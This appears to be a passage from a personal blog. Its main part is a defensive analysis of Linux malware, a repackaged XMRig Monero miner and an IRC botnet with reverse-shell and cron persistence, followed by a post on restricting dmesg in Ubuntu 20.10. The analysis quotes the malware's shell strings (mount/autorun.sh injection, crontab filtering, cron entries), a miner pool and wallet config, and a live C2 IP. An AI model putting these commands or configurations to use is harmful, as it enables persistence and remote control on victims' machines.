daemon   100394  397 29.4 2894488 2402584 ?     Sl   05:34 735:24 /tmp/dovecat

The kernel logs showed that dovecat was segfaulting occasionally:

kernel: [2394416.671219] dovecat[46657]: segfault at 63 ip 00007f2be096b448 sp 00007f2be2393490 error 4 in libnss_files-2.27.so[7f2be0968000+b000]
kernel: [2424348.437406] dovecat[53028]: segfault at 63 ip 00007f45e1b60448 sp 00007f45e3588490 error 4 in libnss_files-2.27.so[7f45e1b5d000+b000]
kernel: [2431562.775108] dovecat[54622]: segfault at 63 ip 00007feec3df1448 sp 00007feec9831490 error 4 in libnss_files-2.27.so[7feec3dee000+b000]
kernel: [2467413.285152] dovecat[62803]: segfault at 63 ip 00007f803f8be448 sp 00007f80412e6490 error 4 in libnss_files-2.27.so[7f803f8bb000+b000]

syslog also showed some strange an alarming cronjobs running with strange names:

CRON[105618]: (daemon) CMD (/var/lock/bash7 > /dev/null 2>&1 &^M)
CRON[105617]: (CRON) info (No MTA installed, discarding output)
CRON[105627]: (daemon) CMD (/var/tmp/sh7 > /dev/null 2>&1 &^M)
CRON[105625]: (CRON) info (No MTA installed, discarding output)
CRON[105628]: (daemon) CMD (/tmp/bash7 > /dev/null 2>&1 &^M)
CRON[105626]: (CRON) info (No MTA installed, discarding output)
CRON[105712]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
CRON[105753]: (daemon) CMD (/var/tmp/sh7 > /dev/null 2>&1 &^M)
CRON[105751]: (CRON) info (No MTA installed, discarding output)
CRON[105754]: (daemon) CMD (/dev/shm/bash7 > /dev/null 2>&1 &^M)
CRON[105758]: (daemon) CMD (/tmp/bash7 > /dev/null 2>&1 &^M)
CRON[105749]: (CRON) info (No MTA installed, discarding output)
CRON[105756]: (daemon) CMD (/var/lock/bash7 > /dev/null 2>&1 &^M)
CRON[105757]: (daemon) CMD (/tmp/init7 > /dev/null 2>&1 &^M)
CRON[105748]: (CRON) info (No MTA installed, discarding output)
CRON[105752]: (CRON) info (No MTA installed, discarding output)
CRON[105750]: (CRON) info (No MTA installed, discarding output) 

Where do I even begin?

dovecat was indeed running directly from /tmp as /tmp/dovecat. The binary itself segfaulting in libnss_files-2.27.so means that dovecat was either poorly written, or that it was trying to link to a system library it was not compiled for, or if it was statically linked, something went wrong in the linker stage.

The cronjobs are particularly alarming, since there are multiple executables, all located in world writable places, such as /tmp, /var/lock, /var/tmp and /dev/shm, and all use the same discard to /dev/null string: > /dev/null 2>&1 &^M. These executables are obviously wanting to hide their output to evade detection, and are placed throughout the disk to gain redundant persistence.

At this point, I asked for samples to be collected for the following files:

/tmp/dovecat
/var/lock/bash7
/var/tmp/sh7
/tmp/bash7
/dev/shm/bash7
/var/lock/bash7
/tmp/init7

They were collected and uploaded to the case, so let’s start doing some in-depth analysis, shall we?

Basic Information on the Collected Samples

If you are wanting to follow along at home, you can find the samples analysed by searching for their SHA256 hash on Google or VirusTotal. I don’t really want to host live malware on my blog, so I won’t offer the samples as a download.

Alright, lets have a look what we have here.

dovecat

SHA256 10c0ed6e8223e4c18475c39beec579911bb18d5e64bf33d2de051c9c59138a08
$ file dovecat 
dovecat: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=5abe6768b29bdf70910880c44f79c991682b439f, stripped

Okay, nothing too surprising here. Statically linked executable built for 64 bit Linux. Let’s check VirusTotal for the hash:

VirusTotal - dovecat

It seems we have a match, and only very recently too. Currently 29 / 61 virus scanning engines detect the binary as a virus, and interestingly, it was first submitted on 2020-10-09 23:23:39, meaning that this executable has been compiled within the last month or so.

The engines seem to class this as some sort of cryptocurrency miner, so we will need to dig into this a bit further.

This is one big executable, at 7mb. We have 6416 functions, which is large, although this is statically linked, so we need to include the various libraries which have been linked into the base executable.

What is interesting is the compiler: GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609. It seems the attacker compiled on Ubuntu 16.04, using the gcc-5 package at the latest version.

bash7 / init7 / sh7

These files are interesting, as all the following samples that were collected:

/var/lock/bash7
/var/tmp/sh7
/tmp/bash7
/dev/shm/bash7
/var/lock/bash7
/tmp/init7

they all have the same hash, and are the same executable. I did a quick check, and it seems they are packed with UPX:

$ strings init7 | grep UPX
UPX!
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved.

I installed UPX, and found they unpack with no problems. The attacker seems to be using a non-modified version of UPX.

$ upx -d init7 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2017
UPX 3.94        Markus Oberhumer, Laszlo Molnar & John Reiser   May 12th 2017

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     73227 <-     36948   50.46%   linux/i386    init7

Unpacked 1 file.

Alright, now the basic stats:

SHA256 f9c3165b9634b8f0ee139905b32e396ab10b30b74a05f4f705b18e841302555
SHA256 (unpacked) 22f1c7056beb9be8acf2ca5b4185ebe422b5566af7b36052b85d35686e38b456
$ file init7
init7: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped

Not stripped? Now that’s interesting. Let’s check VirusTotal.

VirusTotal - hy4

Interesting again, only 6 / 61 virus engines detect this as malware. It seems very new as well, with the first submission only being 4 days ago: 2020-10-22 08:40:27.

This malware has something to hide, thats for sure. We are going to need to look deeper into this one as well.

This binary is much smaller, at 72kb. There are still a lot of functions, 241 of them, but are mostly going to be library functions that have been statically linked. The compiler is a bit more older, and doesn’t seem to be an Ubuntu provided one.

Advanced Static Analysis

Time to have a look into these executables from an assembly language perspective, and see if we can determine exactly what these binaries do.

Today I’ll be using radare2-cutter and Ghidra. Just the latest upstream version from their respective websites.

dovecat

The entrypoint to dovecat isn’t interesting, it seems to jump around and setup various statically linked libraries. I skipped ahead to main():

We seem to check some magic numbers, and if the check fails, we exit, otherwise we enter an infinite loop that calls three functions over and over.

Those three functions themselves aren’t interesting either. Looks like we will have to go hunting for some strings and do some x-refs to see what is going on.

With 101933 strings to go through, this is going to be tough. We might have to search. Since VirusTotal seems to think this is a cryptocurrency miner, let’s try things like “bitcoin”, “coin”, “mine”.

“bitcoin” came up empty. “coin” wasn’t useful either. “mine” was very, very useful, since it came up with this string:

{"autosave": true,
 "donate-level": 0,
 "cpu": true,
 "opencl": false,
 "cuda": false,
 "pools":
 [
     {    
          "url": "pool.minexmr.com:443",
          "user": "46bHvv8wD6B2PF3aiNoWq2K89GiT5QXpFYg2dP898PRwasqWYSEHzNjVznCPCDpoNa7N8QPJD94P4jK4pWKoRixB5zR3TnQ",
          "rig-id": "w1",
          "keepalive": true,
          "tls": true
     }
 ]
}

This seems to be some sort of configuration for this binary. It has CPU mining enabled, but opencl and cuda disabled. Weird, normally you would want to take advantage of a GPU if the system had one.

It also shows it is a member of the mining pool pool.minexmr.com:443, and supplies a user hash 46bHvv8wD6B2PF3aiNoWq2K89GiT5QXpFYg2dP898PRwasqWYSEHzNjVznCPCDpoNa7N8QPJD94P4jK4pWKoRixB5zR3TnQ.

Let’s go to the mining pool website, and see if we can get some information about the user hash we have here.

MineXMR Mining Dashboard

Well, well, well, what have we stumbled upon.

It seems this user hash is a wallet public key for the Monero cryptocurrency. Monero is one of those privacy coins with a hidden ledger. You can’t see the balance of a particular wallet. Kind of frustrating for detectives you know?

Anyway, it seems the attacker is pulling a hashrate of 161kh/s, over 3 “workers”. At the time of writing, they have pocketed 1.861194 XMR for their efforts, which is about $248 USD or $371 NZD or $210 Euro.

The hashrate seems to be going upward, but it goes up and down, probably as machines are infected, start mining, get discovered by their owners, and then offlined.

There seems to be 3 “workers”, although, I think multiple machines are identifying themselves as a single “worker”. The configuration string we saw had "rig-id": "w1" set, which means the system was probably in the w1 worker.

Alright, we have now established that this malware is likely a Monero (XMR) cryptocurrency miner. Now we need to try and see if this program is hiding any other secrets, or if it is just an off the shelf miner.

Back to string searching in the binary, it seems we have found a man page, or the documentation for the program:

These strings indicate that this is a copy of XMRig 6.3.3, which is free and open source Monero mining software. It’s upstream code repository is:

https://github.com/xmrig/xmrig

Having a further look at the binary, it is looking like the attacker just cloned the repo, hard coded their configuration in, and statically compiled a binary, and named it dovecat to try make it blend into a system, so people would think its just dovecot, which is a mail daemon.

I don’t think we need to look at any more assembly for this executable, the executable is too large, and it is very likely going to be benign. We can always catch bad behaviour during dynamic analysis.

bash7 / init7 / sh7 aka hy4

Time to dive into the next malware sample, bash7 / init7 / sh7. This one is small enough that we should be able to cover most of its functions.

Now, what I find striking about this sample, is that it isn’t stripped. This sample has its debug symbols intact. Why? Did the attacker forget to strip the binary before pushing it to the world? Or is it intentional? Who knows.

But we are exceptionally lucky. Now we can get some serious insight into this binary.

Ghidra shows us a list of files which this executable was compiled from. There are 190 different files in total, a few of them are below:

Click for full list of files

The only one that stood out was “hy4.c”. It doesn’t seem to be a part of any standard library, and searches return no results. I suppose we will call this malware hy4 from now on.

Since we can see a list of all functions this malware calls, it shouldn’t be too hard determining what it does.

Click for full list of functions

Lets jump to main() and have a look:

The control flow graph itself isn’t too bad. We seem to have a large initialisation stage, followed by some blocks at the bottom which seem to be infinite loops that are swapped between.

The first thing that hy4 does is call rand_init(), daemonize() and bindport(). Let’s see what these do.

rand_init() seems to set ‘x’ to the time, ‘y’ seems to be the xor of process id and parent process id, and z seems to be the clock. w seems to be the xor of clock and time.

daemonize() seems to see if the process is a child, and if it isn’t, then it forks. It checks to see if fork() fails, and if it does then it exits, and the parent also exits. Only the child remains running.

It then redirects the programs file descriptiors for stdin and stdout to /dev/null, and changes the signal handler for the following signals:

0x11 - SIGCHLD
0x14 - SIGSTP
0x16 - SIGTTOU
0x15 - SIGTTIN
1    - SIGHUP
0xf  - SIGTERM

The new signal handler is 0x1, or True. Looking at the signals changed, it seems the attacker really doesn’t want this malware to be killed or interrupted.

bindport() seems to create a socket, and bind it. To see what port, we bind &local_18 of type sockaddr. The compiler has done some stuff, so:

struct sockaddr {
       sa_family_t sa_family;
       char        sa_data[14];
}

sa_family is 2 as per &local_18. sa_data is derived from local_14 and local_16.

We then start listening on the port.

What happens next is kinda weird. hy4 checks to see if /share/CACHEDEV1_DATA/Web exists. If it does, we enter the if statement:

It then executes some shell commands using system(). The first tries to mount a bunch of devices in a brute force fashion to /tmp/config. with the below command:

mount $(/sbin/hal_app --get_boot_pd port_id=0)6 /tmp/config ; 
mount -t ext2 /dev/mtdblock4 /tmp/config ; 
mount -t ext2 /dev/mtdblock5 /tmp/config ; 
mount -t ext2 /dev/sdx6 /tmp/config ; 
mount -t ext2 /dev/sdc6 /tmp/config"

If any of these succeed, then it runs a command to make a autorun file that is a shell script:

echo \"#!/bin/sh\n%s\" > /tmp/config/autorun.sh ; 
chmod +x /tmp/config/autorun.sh

Script seems empty for now. What is this /share/CACHEDEV1_DATA/Web directory? Is it from some sort of vulnerable internet of things device? I googled it and it seems to be for QNAP devices. QNAP seems to manufacture NAS, video cameras and stuff. Typical internet of things device.

Moving on.

The code then attempts to access a bunch of directories to see if they are writable.

These directories look familiar…

/dev/shm/
/var/tmp/
/tmp/
/var/lock/
/var/run/

If they are writable, they get added to some sort of list. It then goes and opens a few crontabs, and does some greps.

"(crontab -l | grep -v \"/%s\" | grep -v \"/sh7\" | grep -v \"/init7\" | grep -v \"/bash7\" | grep -v \"no cron\" > %s) > /dev/null 2>&1"

Hmm. Is it checking to see if the crontab is already infected? I think it is.

If the system is not already infected, it calls injectbot() on the following directories:

$PWD
/dev/shm/
/var/tmp/
/tmp/
/var/lock/
/var/run/

Lets look at injectbot():

It seems to have “init7”, “bash7” and “sh7” hard-coded, and selects them randomly depending on the gettimeofday() and a random chance. From there malloc() a buffer, where we make a copy of the running executable, and copy it to the new path with the newly randomly chosen name.

Since this happens a bunch of times, we end up with all the duplicate copies.

Once these have been run, a new cronjob is installed in the system, in this case at /var/spool/cron/crontabs/daemon.

If we look at the sosreport from the infected system, we see:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/var/lock/.hh21804289383 installed on Thu Oct 22 12:54:01 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * /var/tmp/bash7 > /dev/null 2>&1 &
*/2 * * * * /var/lock/init7 > /dev/null 2>&1 &
*/1 * * * * /dev/shm/sh7 > /dev/null 2>&1 &
*/10 * * * * /tmp/init7 > /dev/null 2>&1 & 

We now fully understand how this malware gains persistence (cronjobs and redundant binaries), and prevents itself from being terminated (forking to daemon, re-registering signal handlers).

Now things start getting more interesting. We have reached the end of the large initialisation section, and have now entered the loops, of what seems to be IRC server communication.

We make some random numbers, call makestring(), which in term, makes a string out the hostname or uname with some random characters added to the end:

From there, the result of makestring() becomes the systems IRC nick. It connects to channel #XLM with pass 321:

After that, hy4 calls con(), which seems to have functionality to swap between different IRC servers. What it seems to do on the first try is to connect to 5.253.84.148, uses the nick, channel and pass from before, and sends the string "NICK %s\nUSER K localhost localhost :2010\n".

After that, two main things happen:

The first, is that hy4 recv() some data, and then calls strtok() to parse it:

There isn’t any indication of what the commands we are parsing are though.

We stay in this loop forever though, so hy4 always waits for instructions, than goes to execute them.

See that call ecx on the far right? It seems we load the address of a function to ecx and execute it. I’m not sure what function though.

Let’s have a look for other functions to see what functionality the IRC commands might call.

376() seems to be how hy4 joins a IRC server, and is pretty explicit:

433() seems to rotate the IRC nick.

_NICK() seems to check for a specific IRC nick.

ping() just seems to reply on IRC with “pong”.

cback() turned out to be extremely interesting. It appears to fork off a new process, which makes a socket, and connects to a remote host on a specific port and IP.

This is your classic reverse shell. It takes two parameters, “IP” and “PORT” and if you pass any more, you get a IRC message error with "NOTICE %s :CBACK <ip> <port>\n".

When you connect to the reverse shell, you see the strings:

"NOTICE %s :Connected.\n"
"echo [-] logged at `date`"
"echo [-] `uname -a || cat /proc/version`"

If you are lucky enough, it will even check for gid 0, and print “root shell!” if you happen to be root:

It then execve("/bin/sh"), and a shell is spawned for the remote attacker. stdin and stdout are redirected to the socket, via the calls to dup2.

There seems to be some steps taken to prevent any commands from this shell from being logged. It also exports a normal $PATH.

I went and tracked down all the strings from the hy4 section, and found:

It seems the commands are just: CBACK, IRC, NOTICE, MODE, JOIN, PONG PRIVMSG, PING, NICK.

I wonder what this string is:

Playful thoughts indeed.

I think that about wraps up the analysis of hy4. What I didn’t come across was a way for a file to be downloaded and executed automatically, but the functionality could very well be there, and I just didn’t look hard enough.

Executive Summary of Malware Infection

Infection Vector

For this particular system, the initial infection vector is unknown.

My only remarks are:

The system was out of date, and had not been patched at all in at least 18 months.
The system was running as a desktop computer, virtualised in the cloud.

Firefox was very old, at version 68. If you run old outdated browsers, along with being out of date on other software, such as the kernel and such, you open yourself up to drive by downloads and arbitrary execution vulnerabilities.

Desktop tasks are exposed to more risks than running a standard production workload, due to web browsing and constantly executing untrusted code in the form of Javascript. It is important to keep these systems up to date, and not forget about these when the are hidden away as virtualised appliances.

I do not believe that this malware was targeted. Quite the opposite, it seems that this malware was just opportunistic, in the right place at the right time, and was only motivated by the attacker making a quick buck.

hy4 was likely first onto the system, and was likely instructed to download and execute dovecat as a malware dropper payload.

dovecat

dovecat is cryptocurrency miner built from a freely accessible program called XMRig, at version 6.3.3. It uses CPU and memory resources to process currency transactions for the Monero (XMR) cryptocurrency.

The executable itself is not dangerous. It does not steal data. All it does is consume computing resources for financial gain in the form of Monero.

dovecat can be removed by terminating the process and deleting the executable.

hy4

hy4 is dangerous and should be considered as a threat. Due to hy4 connecting to and forming a part of a IRC botnet, and accepting commands remotely, any system found to be infected with hy4 should be considered compromised, and should be removed from production immediately.

Since an attacker has the ability to spawn a root shell, and interact with it remotely, an attacker can explore the compromised system, and can steal data with ease. All credentials on this machine should be revoked, and assume an attacker has constant remote access to the compromised machine.

Since hy4 gains deep persistence and is difficult to terminate, I recommend that the system is to be decommissioned and erased, and installed fresh in order to remove the infection.

Recommendations

I always recommend you keep your system up to date. If possible, patch daily or at least weekly, and it helps if you are running the latest Ubuntu LTS.

If you have a number of machines, you can install a program called unattended-upgrades with $ sudo apt install unattended-upgrades. It will patch the machine on a regular schedule.

If you have a large fleet of machines, then maybe a service like Landscape can be useful. It lets you view your fleet’s update status on a nice web interface, and you can patch your fleet with a few clicks in your web browser.

As always, only trust software from the official Ubuntu software archives. When you download and install software from a website to your machine, you are taking a risk that the software is not malicious.

My Thoughts on the Malware and Attribution

I have reverse engineered a fair amount of malware in my time, but this was the first Linux malware I have ever looked into. On the whole it was actually pretty pleasant, due to Cutter and Ghidra being very mature tools. The only thing missing is a good debugger, and I miss not being able to use x64dbg, since its Windows only.

The malware itself was pretty interesting. hy4 is one interesting specimen. dovecat not so much, since it is a rebuilt open source miner, just hard coded to mine Monero for the attacker.

hy4 is strange at a first glance. Not stripping debugging symbols was a huge mistake on the attacker’s part. It meant that I could read function names in the code just as they were in the source code, and the symbols also helped Ghidra’s decompiler build an accurate source code picture.

hy4 itself is also remarkably simple. It gains persistence, and joins an IRC botnet and awaits external instructions. Its functionality allows to spawn a reverse shell back to the attacker, and very likely carries functionality to download and execute malware.

It seems very basic. Someone has obviously written this as their first foray into cybercrime. The techniques used to gain persistence and prevent being terminated are entry level, but its complex as it talks to a remote C2 server.

This is no teenage script kiddy. This is a semi-experienced to experienced software engineer who is likely very new to writing malware, and this is probably their first botnet.

The malware was written by hand, and the botnet is probably owned by the author of the malware. The author is probably early in their career, recently finishing University with some sort of Computer Science degree, and has taken some operating system classes to learn about fork(), dup2() and signals.

Most script kiddys could buy a quality exploit kit + botnet off of the dark net for a few hundred dollars, and it would be fully featured and be much more complex than hy4 is.

hy4 seems to be full of beginner mistakes, for example, not stripping the binary, using a default UPX and not modifying the UPX distribution such that normal UPX won’t be able to unpack the executable. All the strings in the binary were not encrypted, or any effort undertaken to hide them. There was no inserting of data bytes in code to fool disassembly algorithms.

There was no hiding domain names or IP addresses.

hy4 and dovecat seem to be compiled very recently, within the last month. dovecat also had metadata intact, and we could see what compiler was used. Possibly written by someone bored at home during COVID lockdowns? Who knows.

To the owner of hy4. Take your botnet down. If someone was sufficiently motivated, they could probably find you. You have likely made similar beginner mistakes with your IRC C2 server. The risk is not worth it for $200 of Monero.

I’m not going to come after you. I don’t care in the slightest. I only did this analysis for fun, and to see what sort of threat this malware has to the community.

But hey, your malware is also great analysis for beginner malware analysts. If anyone reading this is a beginner reverse engineer, give these samples a try. You won’t be disappointed.

Conclusion

Today, we did a full analysis of the dovecat and hy4 malware, from samples taken from a real production machine that had been infected, from a case filed about some suspicious behaviour.

We determined that dovecat is a cryptocurrency miner that mines Monero (XMR), and hy4 is a IRC botnet malware dropper, that has the ability to spawn root shells, and to execute malware payloads.

I had a lot of fun analysing this malware. It’s great to get back to reverse engineering again. I don’t get a lot of opportunities to open up Cutter and Ghidra these days. I like pulling things apart and admiring other’s hard work, and solving puzzles that reverse engineering binaries bring.

I hope you enjoyed the writeup. If you have any questions or comments, contact me.

Matthew Ruffell

Getting DMESG_RESTRICT Enabled in Ubuntu 20.10 Groovy Gorilla

2020-10-24T00:00:00+00:00

You might have noticed a small change when running the dmesg command in Ubuntu 20.10 Groovy Gorilla, since it now errors out with:

dmesg: read kernel buffer failed: Operation not permitted

Don’t worry, it still works, it has just become a privileged operation, and it works fine with sudo dmesg. But why the change?

Well, I happen to be the one who proposed for this change to be made, and followed up on getting the configuration changes made. This blog post will describe how it slightly improves the security of Ubuntu, and the journey to getting the changes landed in a release.

So stay tuned, and let’s dive into dmesg.

What is dmesg?

dmesg is a command that allows you to view the kernel log buffer. The kernel log buffer contains a whole wealth of information about system hardware, devices attached and their allocated memory regions, and error logging for the system.

This log buffer usually lives at /dev/kmsg or /proc/kmsg, which is what tools like dmesg or journalctl or various syslog programs read from.

If we look at some typical start-up information, it really isn’t too interesting.

Why is restricting dmesg important?

The thing is, the kernel log buffer can sometimes contain all sorts of security critical information, such as pointers to kernel memory. There has been a large effort in the mainline kernel for a few years now to remove all instances of printk("%p"), which leaked raw kernel pointers to the kernel log buffer.

These days, all %p format strings hash the kernel pointer, so the address itself is not leaked, but still gives a unique identifier for developers to look at when doing printk.

However, kernel pointers can still be leaked in other ways, such as if the system suffers an oops, it will print the current kernel stacktrace, as well as provide a copy of register values:

 [3191370.893495] WARNING: CPU: 13 PID: 48929 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
 [3191370.893552] CPU: 13 PID: 48929 Comm: CPU 0/KVM Not tainted 4.15.0-106-generic #107~16.04.1-Ubuntu
 [3191370.893552] Hardware name: Dell Inc. PowerEdge R740xd/00WGD1, BIOS 2.6.4 04/09/2020
 [3191370.893554] RIP: 0010:follow_page_pte+0x6f4/0x710
 [3191370.893555] RSP: 0018:ffffad279f7ab908 EFLAGS: 00010286
 [3191370.893556] RAX: ffffdc0fa72eba80 RBX: ffffdc0f9b1535b0 RCX: 0000000080000000
 [3191370.893556] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 800000b9cbaea225
 [3191370.893557] RBP: ffffad279f7ab970 R08: 800000b9cbaea225 R09: ffff9359857fd5f0
 [3191370.893558] R10: 0000000000000000 R11: 0000000000000000 R12: ffffdc0fa72eba80
 [3191370.893558] R13: 0000000000000326 R14: ffff935de09e19e0 R15: ffff9359857fd5f0
 [3191370.893559] FS:  00007f68757fa700(0000) GS:ffff93617ef80000(0000) knlGS:ffff964a7fc00000
 [3191370.893559] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [3191370.893560] CR2: 00007ff92ca7a000 CR3: 000000b7209d2005 CR4: 00000000007626e0
 [3191370.893561] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
 [3191370.893561] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
 [3191370.893561] PKRU: 55555554
 [3191370.893562] Call Trace:
 [3191370.893565]  follow_pmd_mask+0x273/0x630
 [3191370.893567]  ? gup_pgd_range+0x23f/0xde0
 [3191370.893568]  follow_page_mask+0x178/0x230
 [3191370.893569]  __get_user_pages+0xb8/0x740
 [3191370.893571]  get_user_pages+0x42/0x50
 [3191370.893604]  __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
 [3191370.893615]  ? mmu_set_spte+0x1dd/0x3a0 [kvm]
 [3191370.893626]  try_async_pf+0x66/0x220 [kvm]
 [3191370.893635]  tdp_page_fault+0x14b/0x2b0 [kvm]
 [3191370.893640]  ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
 [3191370.893649]  kvm_mmu_page_fault+0x62/0x180 [kvm]
 [3191370.893651]  handle_ept_violation+0xbc/0x160 [kvm_intel]
 [3191370.893654]  vmx_handle_exit+0xa5/0x580 [kvm_intel]
 [3191370.893664]  vcpu_enter_guest+0x414/0x1260 [kvm]
 [3191370.893674]  kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
 [3191370.893683]  ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
 [3191370.893691]  kvm_vcpu_ioctl+0x33a/0x610 [kvm]
 [3191370.893693]  ? audit_filter_rules+0x232/0x1070
 [3191370.893696]  do_vfs_ioctl+0xa4/0x600
 [3191370.893697]  ? __audit_syscall_entry+0xac/0x100
 [3191370.893699]  ? syscall_trace_enter+0x1d6/0x2f0
 [3191370.893700]  SyS_ioctl+0x79/0x90
 [3191370.893701]  do_syscall_64+0x73/0x130
 [3191370.893704]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2

If kernel pointers happen to be in the registers at the time of oops, they get leaked to the kernel log buffer.

Kernel pointers are valuable to attackers and exploit developers, because they act as information leaks. These information leaks make it much easier to de-randomise the kernel base address and to defeat KASLR. If an attacker is trying to launch a privilege escalation attack against a recently compromised host, they can also use dmesg to get instant feedback on their exploits, as failures will cause further oops messages or segmentation faults. This makes it easier for attackers to fix and tune their exploit programs until they work.

Currently, if I create a new, unprivileged user on a Focal system, they cannot access /var/log/kern.log, /var/log/syslog or see system events in journalctl. But yet, they are given free reign to the kernel log buffer.

$ sudo adduser dave
$ su dave
$ groups
dave
$ cat /var/log/kern.log
cat: /var/log/kern.log: Permission denied
$ cat /var/log/syslog
cat: /var/log/syslog: Permission denied
$ journalctl
Hint: You are currently not seeing messages from other users and the system.
      Users in groups 'adm', 'systemd-journal' can see all messages.
      Pass -q to turn off this notice.
Jun 16 23:44:59 ubuntu systemd[2328]: Reached target Main User Target.
Jun 16 23:44:59 ubuntu systemd[2328]: Startup finished in 69ms.
$ dmesg
[    0.000000] Linux version 5.4.0-34-generic (buildd at lcy01-amd64-014)
(gcc version 9.3.0 (Ubuntu 9.3.0-10ubuntu2)) #38-Ubuntu SMP Mon May 25 15:46:55
UTC 2020 (Ubuntu 5.4.0-34.38-generic 5.4.41)
[    0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-5.4.0-34-generic
root=UUID=f9f909c3-782a-43c2-a59d-c789656b4188 ro

Strange how an unprivileged user can read dmesg just fine, and yet cannot access any other kernel logs on the system.

The Initial Proposal

I sent a proposal to ubuntu-devel in June which outlines the above problems, to gather some feedback and to see if anyone else thinks that this is a good idea.

Proposal: Enabling DMESG_RESTRICT for Groovy Onward

I suggested that we restrict access to dmesg to users in group ‘adm’ like so:

CONFIG_SECURITY_DMESG_RESTRICT=y in the kernel.
Following changes to /bin/dmesg permissions in package util-linux
- Ownership changes to root:adm
- Permissions changed to 0750 (-rwxr-x---)
- Add cap_syslog capability to binary.
Add a commented out # kernel.dmesg_restrict = 0 to /etc/sysctl.d/10-kernel-hardening.conf

Let’s break these down.

Number 1 is how DMESG_RESTRICT gets enforced, as setting CONFIG_SECURITY_DMESG_RESTRICT=y in the kernel config restricts the kernel log buffer to executables with CAP_SYSLOG, or root privileges.

Number 2 allows users in the adm group, also known as “administration”, to be able to execute dmesg without becoming super user, which means nothing would change for default users in most systems.

Number 3 adds a easy way for system administrators to disable the change if they want.

I filed a Launchpad bug to document the changes and track the patches I had created for util-linux and procps.

LP #1886112 Enabling DMESG_RESTRICT in Groovy Onward

Early Responses and Getting the Kernel Config Changed (1)

The security team were +1 with the change:

https://lists.ubuntu.com/archives/ubuntu-devel/2020-June/041067.html

When I woke up the next day, the strangest thing happened. Phoronix had written an article about my proposal!

Ubuntu 20.10 Looking At Restricting Access To Kernel Logs With dmesg

This wasn’t expected at all, and it got people talking about the change in forums, instead of it just being silently made and me hoping that no one noticed.

After that, Seth Forshee, from the kernel team, double checked with the security team, and then went ahead and applied the change to the “unstable” kernel tree, since Groovy’s kernel had not yet forked off from it at that point in time.

https://lists.ubuntu.com/archives/ubuntu-devel/2020-July/041079.html

The kernel commit is:

Commit 25e6c851704a47c81e78e1a82530ac4b328098a6
From: Seth Forshee <seth.forshee@canonical.com>
Date: Thu, 2 Jul 2020 13:29:55 -0500
Subject: UBUNTU: [Config] CONFIG_SECURITY_DMESG_RESTRICT=y
Link: https://kernel.ubuntu.com/git/ubuntu/unstable.git/commit/?id=25e6c851704a47c81e78e1a82530ac4b328098a6

Now that the configuration change was made in the kernel, Number 1 in the list was completed.

Upstream Discussions for Adding CAP_SYSLOG to /bin/dmesg (2)

At this point, things got a bit stuck. I got busy and no one else replied to my previous posts, so the changes to util-linux got a little delayed.

I restarted these talks with the below message to ubuntu-devel, and included the upstream Debian maintainers to the CC list.

https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041117.html

This was successful, and Chris Hofstaedtler, wrote back. Chris asked if this had been discussed before in Debian:

https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041118.html

I responded with what I could find, but I also mentioned that I would write to debian-devel.

https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041125.html

So, I went and proposed similar changes to debian-devel in this thread:

https://lists.debian.org/debian-devel/2020/08/msg00107.html

I got some positive responses, but the most interesting one was from Ansgar:

https://lists.debian.org/debian-devel/2020/08/msg00121.html

Ansgar mentioned that if /bin/dmesg is granted CAP_SYSLOG, and /bin/dmesg was opened up to users of group adm, then any user of adm could clear the kernel log buffer by running $ dmesg --clear.

Now, I had missed this, and it was an excellent catch.

We don’t want to make it easier for anyone to clear the kernel log buffer, since it can be used to hide an attackers presence, so adding CAP_SYSLOG to /bin/dmesg is a bad idea.

Chris mentions this in his message back:

https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041151.html

From there, Steve Langasek also mentioned that it was a bad idea:

https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041152.html

and with that, I decided to drop the idea of adding CAP_SYSLOG to /bin/dmesg and changing the group to adm:

https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041153.html

That makes Number 2 on the list struck off. It’s a bit of a pity, since it means that users in group adm have to write $ sudo dmesg instead of $ dmesg. Hopefully it won’t be too much of a bother to become superuser to view dmesg. Time will tell I suppose, and most distros follow this behaviour anyway.

Landing sysctl Configuration Changes (3)

Shortly after the upstream util-linux discussion ended, Brian Murrary sponsored my patches to procps to add some documentation about CONFIG_SECURITY_DMESG_RESTRICT and instructions on how to disable it by changing a sysctl variable.

As my description states, if you want to turn off DMESG_RESTRICT, you can do so by uncommenting the sysctl string kernel.dmesg_restrict = 0, and rebooting.

With this, Number 3 in the list was completed.

Conclusion

That is the story of how DMESG_RESTRICT was enabled in Ubuntu 20.10 Groovy Gorilla. We covered how it slightly improves system security by removing an avenue attackers could use to view leaked kernel pointers, the process of getting all the separate changes landed, and relevant upstream discussions.

I hope you enjoyed the read, and if you have any questions or comments, feel free to contact me.

Matthew Ruffell

Debugging a Zero Page Reference Counter Overflow on the Ubuntu 4.15 Kernel

2020-09-02T00:00:00+00:00

Recently I worked a particularly interesting case where an OpenStack compute node had all of its virtual machines pause at the same time, which I attributed to a reference counter overflowing in the kernel’s zero_page.

